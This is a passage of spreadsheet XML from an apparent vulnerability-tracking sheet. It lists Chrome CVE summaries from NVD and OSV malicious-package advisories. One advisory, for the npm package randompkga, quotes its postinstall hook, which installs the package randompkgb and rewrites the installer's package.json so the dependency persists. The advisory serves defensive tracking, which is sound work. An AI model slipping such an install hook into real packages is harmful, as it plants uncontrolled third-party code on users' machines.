      <c r="D1023" s="5" t="inlineStr"/>
      <c r="E1023" s="5" t="inlineStr"/>
      <c r="F1023" s="5" t="inlineStr"/>
      <c r="G1023" s="5" t="inlineStr"/>
      <c r="H1023" s="5" t="inlineStr"/>
      <c r="I1023" s="5" t="inlineStr"/>
      <c r="J1023" s="5" t="inlineStr"/>
      <c r="K1023" s="5" t="inlineStr"/>
      <c r="L1023" s="5" t="inlineStr"/>
      <c r="M1023" s="5" t="inlineStr"/>
      <c r="N1023" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1023" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1023" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1023" s="5" t="inlineStr"/>
      <c r="R1023" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1023" s="5" t="inlineStr">
        <is>
          <t>Use after free in Extensions in Google Chrome prior to 153.0.8010.52 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted Chrome extension. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T1023" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93373</t>
        </is>
      </c>
    </row>
    <row r="1024">
      <c r="A1024" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1024" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1024" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93374</t>
        </is>
      </c>
      <c r="D1024" s="5" t="inlineStr"/>
      <c r="E1024" s="5" t="inlineStr"/>
      <c r="F1024" s="5" t="inlineStr"/>
      <c r="G1024" s="5" t="inlineStr"/>
      <c r="H1024" s="5" t="inlineStr"/>
      <c r="I1024" s="5" t="inlineStr"/>
      <c r="J1024" s="5" t="inlineStr"/>
      <c r="K1024" s="5" t="inlineStr"/>
      <c r="L1024" s="5" t="inlineStr"/>
      <c r="M1024" s="5" t="inlineStr"/>
      <c r="N1024" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1024" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1024" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1024" s="5" t="inlineStr"/>
      <c r="R1024" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1024" s="5" t="inlineStr">
        <is>
          <t>Use after free in Dawn in Google Chrome on on Android prior to 153.0.8010.52 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="T1024" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93374</t>
        </is>
      </c>
    </row>
    <row r="1025">
      <c r="A1025" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1025" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1025" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93375</t>
        </is>
      </c>
      <c r="D1025" s="5" t="inlineStr"/>
      <c r="E1025" s="5" t="inlineStr"/>
      <c r="F1025" s="5" t="inlineStr"/>
      <c r="G1025" s="5" t="inlineStr"/>
      <c r="H1025" s="5" t="inlineStr"/>
      <c r="I1025" s="5" t="inlineStr"/>
      <c r="J1025" s="5" t="inlineStr"/>
      <c r="K1025" s="5" t="inlineStr"/>
      <c r="L1025" s="5" t="inlineStr"/>
      <c r="M1025" s="5" t="inlineStr"/>
      <c r="N1025" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1025" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1025" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1025" s="5" t="inlineStr"/>
      <c r="R1025" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="S1025" s="5" t="inlineStr">
        <is>
          <t>Incorrect reference resolution in Tracing in Google Chrome on on Windows prior to 153.0.8010.52 allowed a local attacker to potentially execute arbitrary code outside the sandbox via a local program. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T1025" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93375</t>
        </is>
      </c>
    </row>
    <row r="1026">
      <c r="A1026" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1026" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1026" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93376</t>
        </is>
      </c>
      <c r="D1026" s="5" t="inlineStr"/>
      <c r="E1026" s="5" t="inlineStr"/>
      <c r="F1026" s="5" t="inlineStr"/>
      <c r="G1026" s="5" t="inlineStr"/>
      <c r="H1026" s="5" t="inlineStr"/>
      <c r="I1026" s="5" t="inlineStr"/>
      <c r="J1026" s="5" t="inlineStr"/>
      <c r="K1026" s="5" t="inlineStr"/>
      <c r="L1026" s="5" t="inlineStr"/>
      <c r="M1026" s="5" t="inlineStr"/>
      <c r="N1026" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1026" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1026" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1026" s="5" t="inlineStr"/>
      <c r="R1026" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S1026" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in DataTransfer in Google Chrome prior to 153.0.8010.52 allowed a local attacker leveraging social engineering to read memory outside the sandbox via a local program. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T1026" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93376</t>
        </is>
      </c>
    </row>
    <row r="1027">
      <c r="A1027" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1027" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1027" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93377</t>
        </is>
      </c>
      <c r="D1027" s="5" t="inlineStr"/>
      <c r="E1027" s="5" t="inlineStr"/>
      <c r="F1027" s="5" t="inlineStr"/>
      <c r="G1027" s="5" t="inlineStr"/>
      <c r="H1027" s="5" t="inlineStr"/>
      <c r="I1027" s="5" t="inlineStr"/>
      <c r="J1027" s="5" t="inlineStr"/>
      <c r="K1027" s="5" t="inlineStr"/>
      <c r="L1027" s="5" t="inlineStr"/>
      <c r="M1027" s="5" t="inlineStr"/>
      <c r="N1027" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1027" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1027" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1027" s="5" t="inlineStr"/>
      <c r="R1027" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S1027" s="5" t="inlineStr">
        <is>
          <t>Type confusion in V8 in Google Chrome prior to 153.0.8010.52 allowed a remote attacker leveraging social engineering to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T1027" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93377</t>
        </is>
      </c>
    </row>
    <row r="1028">
      <c r="A1028" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1028" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1028" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93378</t>
        </is>
      </c>
      <c r="D1028" s="5" t="inlineStr"/>
      <c r="E1028" s="5" t="inlineStr"/>
      <c r="F1028" s="5" t="inlineStr"/>
      <c r="G1028" s="5" t="inlineStr"/>
      <c r="H1028" s="5" t="inlineStr"/>
      <c r="I1028" s="5" t="inlineStr"/>
      <c r="J1028" s="5" t="inlineStr"/>
      <c r="K1028" s="5" t="inlineStr"/>
      <c r="L1028" s="5" t="inlineStr"/>
      <c r="M1028" s="5" t="inlineStr"/>
      <c r="N1028" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1028" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1028" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1028" s="5" t="inlineStr"/>
      <c r="R1028" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S1028" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Storage in Google Chrome prior to 153.0.8010.52 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted PDF file. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T1028" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93378</t>
        </is>
      </c>
    </row>
    <row r="1029">
      <c r="A1029" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1029" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1029" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93379</t>
        </is>
      </c>
      <c r="D1029" s="5" t="inlineStr"/>
      <c r="E1029" s="5" t="inlineStr"/>
      <c r="F1029" s="5" t="inlineStr"/>
      <c r="G1029" s="5" t="inlineStr"/>
      <c r="H1029" s="5" t="inlineStr"/>
      <c r="I1029" s="5" t="inlineStr"/>
      <c r="J1029" s="5" t="inlineStr"/>
      <c r="K1029" s="5" t="inlineStr"/>
      <c r="L1029" s="5" t="inlineStr"/>
      <c r="M1029" s="5" t="inlineStr"/>
      <c r="N1029" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1029" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1029" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1029" s="5" t="inlineStr"/>
      <c r="R1029" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S1029" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in ORB in Google Chrome prior to 153.0.8010.52 allowed a remote attacker to bypass site isolation via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T1029" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93379</t>
        </is>
      </c>
    </row>
    <row r="1030">
      <c r="A1030" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1030" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1030" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93380</t>
        </is>
      </c>
      <c r="D1030" s="5" t="inlineStr"/>
      <c r="E1030" s="5" t="inlineStr"/>
      <c r="F1030" s="5" t="inlineStr"/>
      <c r="G1030" s="5" t="inlineStr"/>
      <c r="H1030" s="5" t="inlineStr"/>
      <c r="I1030" s="5" t="inlineStr"/>
      <c r="J1030" s="5" t="inlineStr"/>
      <c r="K1030" s="5" t="inlineStr"/>
      <c r="L1030" s="5" t="inlineStr"/>
      <c r="M1030" s="5" t="inlineStr"/>
      <c r="N1030" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1030" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1030" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1030" s="5" t="inlineStr"/>
      <c r="R1030" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S1030" s="5" t="inlineStr">
        <is>
          <t>Race condition in FileSystem in Google Chrome prior to 153.0.8010.52 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T1030" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93380</t>
        </is>
      </c>
    </row>
    <row r="1031">
      <c r="A1031" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1031" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1031" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93381</t>
        </is>
      </c>
      <c r="D1031" s="5" t="inlineStr"/>
      <c r="E1031" s="5" t="inlineStr"/>
      <c r="F1031" s="5" t="inlineStr"/>
      <c r="G1031" s="5" t="inlineStr"/>
      <c r="H1031" s="5" t="inlineStr"/>
      <c r="I1031" s="5" t="inlineStr"/>
      <c r="J1031" s="5" t="inlineStr"/>
      <c r="K1031" s="5" t="inlineStr"/>
      <c r="L1031" s="5" t="inlineStr"/>
      <c r="M1031" s="5" t="inlineStr"/>
      <c r="N1031" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1031" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1031" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1031" s="5" t="inlineStr"/>
      <c r="R1031" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S1031" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in PDFium in Google Chrome on on Windows prior to 153.0.8010.52 allowed a remote attacker leveraging social engineering to potentially execute arbitrary code inside the sandbox via a crafted PDF file. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T1031" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93381</t>
        </is>
      </c>
    </row>
    <row r="1032">
      <c r="A1032" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1032" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1032" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93382</t>
        </is>
      </c>
      <c r="D1032" s="5" t="inlineStr"/>
      <c r="E1032" s="5" t="inlineStr"/>
      <c r="F1032" s="5" t="inlineStr"/>
      <c r="G1032" s="5" t="inlineStr"/>
      <c r="H1032" s="5" t="inlineStr"/>
      <c r="I1032" s="5" t="inlineStr"/>
      <c r="J1032" s="5" t="inlineStr"/>
      <c r="K1032" s="5" t="inlineStr"/>
      <c r="L1032" s="5" t="inlineStr"/>
      <c r="M1032" s="5" t="inlineStr"/>
      <c r="N1032" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1032" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1032" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1032" s="5" t="inlineStr"/>
      <c r="R1032" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1032" s="5" t="inlineStr">
        <is>
          <t>Use after free in PDFium in Google Chrome prior to 153.0.8010.52 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T1032" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93382</t>
        </is>
      </c>
    </row>
    <row r="1033">
      <c r="A1033" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1033" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1033" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93383</t>
        </is>
      </c>
      <c r="D1033" s="5" t="inlineStr"/>
      <c r="E1033" s="5" t="inlineStr"/>
      <c r="F1033" s="5" t="inlineStr"/>
      <c r="G1033" s="5" t="inlineStr"/>
      <c r="H1033" s="5" t="inlineStr"/>
      <c r="I1033" s="5" t="inlineStr"/>
      <c r="J1033" s="5" t="inlineStr"/>
      <c r="K1033" s="5" t="inlineStr"/>
      <c r="L1033" s="5" t="inlineStr"/>
      <c r="M1033" s="5" t="inlineStr"/>
      <c r="N1033" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1033" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1033" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1033" s="5" t="inlineStr"/>
      <c r="R1033" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S1033" s="5" t="inlineStr">
        <is>
          <t>Information leak in Permissions in Google Chrome prior to 153.0.8010.52 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T1033" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93383</t>
        </is>
      </c>
    </row>
    <row r="1034">
      <c r="A1034" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1034" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1034" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93384</t>
        </is>
      </c>
      <c r="D1034" s="5" t="inlineStr"/>
      <c r="E1034" s="5" t="inlineStr"/>
      <c r="F1034" s="5" t="inlineStr"/>
      <c r="G1034" s="5" t="inlineStr"/>
      <c r="H1034" s="5" t="inlineStr"/>
      <c r="I1034" s="5" t="inlineStr"/>
      <c r="J1034" s="5" t="inlineStr"/>
      <c r="K1034" s="5" t="inlineStr"/>
      <c r="L1034" s="5" t="inlineStr"/>
      <c r="M1034" s="5" t="inlineStr"/>
      <c r="N1034" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1034" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1034" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1034" s="5" t="inlineStr"/>
      <c r="R1034" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S1034" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery in Omnibox in Google Chrome on on Android prior to 153.0.8010.52 allowed a remote attacker leveraging social engineering to bypass system access restrictions via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T1034" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93384</t>
        </is>
      </c>
    </row>
    <row r="1035">
      <c r="A1035" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1035" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1035" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93385</t>
        </is>
      </c>
      <c r="D1035" s="5" t="inlineStr"/>
      <c r="E1035" s="5" t="inlineStr"/>
      <c r="F1035" s="5" t="inlineStr"/>
      <c r="G1035" s="5" t="inlineStr"/>
      <c r="H1035" s="5" t="inlineStr"/>
      <c r="I1035" s="5" t="inlineStr"/>
      <c r="J1035" s="5" t="inlineStr"/>
      <c r="K1035" s="5" t="inlineStr"/>
      <c r="L1035" s="5" t="inlineStr"/>
      <c r="M1035" s="5" t="inlineStr"/>
      <c r="N1035" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1035" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1035" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1035" s="5" t="inlineStr"/>
      <c r="R1035" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S1035" s="5" t="inlineStr">
        <is>
          <t>Information leak in Paint in Google Chrome prior to 153.0.8010.52 allowed a remote attacker to obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T1035" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93385</t>
        </is>
      </c>
    </row>
    <row r="1036">
      <c r="A1036" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1036" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1036" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93386</t>
        </is>
      </c>
      <c r="D1036" s="5" t="inlineStr"/>
      <c r="E1036" s="5" t="inlineStr"/>
      <c r="F1036" s="5" t="inlineStr"/>
      <c r="G1036" s="5" t="inlineStr"/>
      <c r="H1036" s="5" t="inlineStr"/>
      <c r="I1036" s="5" t="inlineStr"/>
      <c r="J1036" s="5" t="inlineStr"/>
      <c r="K1036" s="5" t="inlineStr"/>
      <c r="L1036" s="5" t="inlineStr"/>
      <c r="M1036" s="5" t="inlineStr"/>
      <c r="N1036" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1036" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1036" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1036" s="5" t="inlineStr"/>
      <c r="R1036" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="S1036" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in WebAppInstalls in Google Chrome prior to 153.0.8010.52 allowed a remote attacker leveraging social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T1036" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93386</t>
        </is>
      </c>
    </row>
    <row r="1037">
      <c r="A1037" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1037" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1037" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93387</t>
        </is>
      </c>
      <c r="D1037" s="5" t="inlineStr"/>
      <c r="E1037" s="5" t="inlineStr"/>
      <c r="F1037" s="5" t="inlineStr"/>
      <c r="G1037" s="5" t="inlineStr"/>
      <c r="H1037" s="5" t="inlineStr"/>
      <c r="I1037" s="5" t="inlineStr"/>
      <c r="J1037" s="5" t="inlineStr"/>
      <c r="K1037" s="5" t="inlineStr"/>
      <c r="L1037" s="5" t="inlineStr"/>
      <c r="M1037" s="5" t="inlineStr"/>
      <c r="N1037" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1037" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1037" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1037" s="5" t="inlineStr"/>
      <c r="R1037" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="S1037" s="5" t="inlineStr">
        <is>
          <t>Improper state validation in Skia in Google Chrome prior to 153.0.8010.52 allowed a remote attacker to obtain cross-origin data via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T1037" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93387</t>
        </is>
      </c>
    </row>
    <row r="1038">
      <c r="A1038" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1038" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1038" s="5" t="inlineStr">
        <is>
          <t>GHSA-532p-c872-3926</t>
        </is>
      </c>
      <c r="D1038" s="5" t="inlineStr"/>
      <c r="E1038" s="5" t="inlineStr"/>
      <c r="F1038" s="5" t="inlineStr"/>
      <c r="G1038" s="5" t="inlineStr"/>
      <c r="H1038" s="5" t="inlineStr"/>
      <c r="I1038" s="5" t="inlineStr"/>
      <c r="J1038" s="5" t="inlineStr"/>
      <c r="K1038" s="5" t="inlineStr"/>
      <c r="L1038" s="5" t="inlineStr">
        <is>
          <t>npm:randompkga</t>
        </is>
      </c>
      <c r="M1038" s="5" t="inlineStr"/>
      <c r="N1038" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1038" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1038" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q1038" s="5" t="inlineStr"/>
      <c r="R1038" s="5" t="inlineStr"/>
      <c r="S1038" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c4e7dfd8fb150e4c7f087a17c2ed162a8e48fe7e4e253a68df901f0e775fd68c)
package.json declares a postinstall lifecycle script `cd "$INIT_CWD" &amp;&amp; npm i randompkgb` that, on `npm install`, installs the additional npm package `randompkgb` into the consumer's project. A companion postinstall.js reads the installer's own package.json at $INIT_CWD, sets `dependencies.randompkgb = "^1.0.0"`, and writes the manifest back to disk, persisting the injected dependency across future installs and CI runs. The caret range is unpinned, so any current or future version of `randompkgb` — whose code is not present in this package and is not controlled by the installer — will be resolved and executed on the installer's machine at install time and on `require`. This is dependency-tree hijacking: the mechanism drops attacker-controlled third-party code into the installer's environment and rewrites source-controlled project state to make the injection durable.
## Source: ghsa-malware (cfdfcd7cd3af1c7b280e6f13503a472f2b31582e239d6fac0b6cacc1709cf36f)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38" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16255</t>
        </is>
      </c>
    </row>
    <row r="1039">
      <c r="A1039" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1039" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1039" s="5" t="inlineStr">
        <is>
          <t>GHSA-5r64-rpvg-q9rr</t>
        </is>
      </c>
      <c r="D1039" s="5" t="inlineStr"/>
      <c r="E1039" s="5" t="inlineStr"/>
      <c r="F1039" s="5" t="inlineStr"/>
      <c r="G1039" s="5" t="inlineStr"/>
      <c r="H1039" s="5" t="inlineStr"/>
      <c r="I1039" s="5" t="inlineStr"/>
      <c r="J1039" s="5" t="inlineStr"/>
      <c r="K1039" s="5" t="inlineStr"/>
      <c r="L1039" s="5" t="inlineStr">
        <is>
          <t>npm:kartykgithub-takedown-a</t>
        </is>
      </c>
      <c r="M1039" s="5" t="inlineStr"/>
      <c r="N1039" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1039" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1039" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1039" s="5" t="inlineStr"/>
      <c r="R1039" s="5" t="inlineStr"/>
      <c r="S1039" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (be4b64316a832dd3482cc41c21d79e2005d5984e2458ed45e957ee761862de31)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39" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16248</t>
        </is>
      </c>
    </row>
    <row r="1040">
      <c r="A1040" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1040" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1040" s="5" t="inlineStr">
        <is>
          <t>GHSA-9395-2g46-rj3f</t>
        </is>
      </c>
      <c r="D1040" s="5" t="inlineStr"/>
      <c r="E1040" s="5" t="inlineStr"/>
      <c r="F1040" s="5" t="inlineStr"/>
      <c r="G1040" s="5" t="inlineStr"/>
      <c r="H1040" s="5" t="inlineStr"/>
      <c r="I1040" s="5" t="inlineStr"/>
      <c r="J1040" s="5" t="inlineStr"/>
      <c r="K1040" s="5" t="inlineStr"/>
      <c r="L1040" s="5" t="inlineStr">
        <is>
          <t>PyPI:djust</t>
        </is>
      </c>
      <c r="M1040" s="5" t="inlineStr">
        <is>
          <t>1.1.1</t>
        </is>
      </c>
      <c r="N1040" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1040" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1040" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1040" s="5" t="inlineStr"/>
      <c r="R1040" s="5" t="inlineStr"/>
